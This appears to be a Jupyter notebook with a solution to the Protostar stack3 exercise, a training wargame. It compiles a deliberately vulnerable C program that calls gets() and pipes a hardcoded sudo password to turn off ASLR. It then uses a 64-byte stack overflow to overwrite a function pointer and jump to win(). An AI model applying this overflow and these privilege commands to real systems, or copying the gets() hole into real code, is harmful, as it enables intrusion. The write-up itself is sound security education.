# protostar/stack3 solution

https://exploit.education/protostar/stack-three/

## compile source code

In [2]:
import os

src = r"""

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
  fflush(stdout); // Added because when invoked by shell seg fault halts stdout..
}

"""

with open("src.c", "w") as f:
    f.write(src)

_ = os.system('gcc src.c -m32 -w -o prog')  # 32bit. disable warnings.

/usr/bin/ld: /tmp/cczb6OtH.o: in function `main':
src.c:(.text+0x57): warning: the `gets' function is dangerous and should not be used.


## solution

First, we have to find the virtual address of win() function. We can achieve it using gbd.

Note that ASLR must be disabled before invoking the application.

In [3]:
import os

# Gain root privileges for Kali Linux & Disable ASLR.
_ = os.system('''
echo "kali" | sudo -S -i
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
''')

# win() virtual address without ASLR.
_ = os.system("gdb -batch -ex 'file prog' -ex 'run' -ex 'info address win' | egrep -o '\"win\".*0x[0-9abcdefABCDEF]{4,8}'")

[sudo] password for kali: 

0
"win" is at 0x56556221


passing argument string with length > 64 will cause a buffer overflow.
The next 4 bytes after the buffer should be the virtual address of win() `0x56556221`.

In [4]:
#!/usr/bin/env python3
import subprocess
from subprocess import PIPE
import struct

p = subprocess.Popen(['./prog'],stdin=PIPE, stdout=PIPE)
res, err = p.communicate(  b'A'*64 + struct.pack("<I", 0x56556221) )
print(res.decode("utf-8"))

calling function pointer, jumping to 0x56556221
code flow successfully changed



In [5]:
import os
# Gain root privileges for Kali Linux & RE-Enable ASLR.
_ = os.system('''
echo "kali" | sudo -S -i
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
''')

2


[sudo] password for kali: 

In [6]:
import sys
print("Python version")
print (sys.version)

Python version
3.9.10 (main, Jan 16 2022, 17:12:18) 
[GCC 11.2.0]
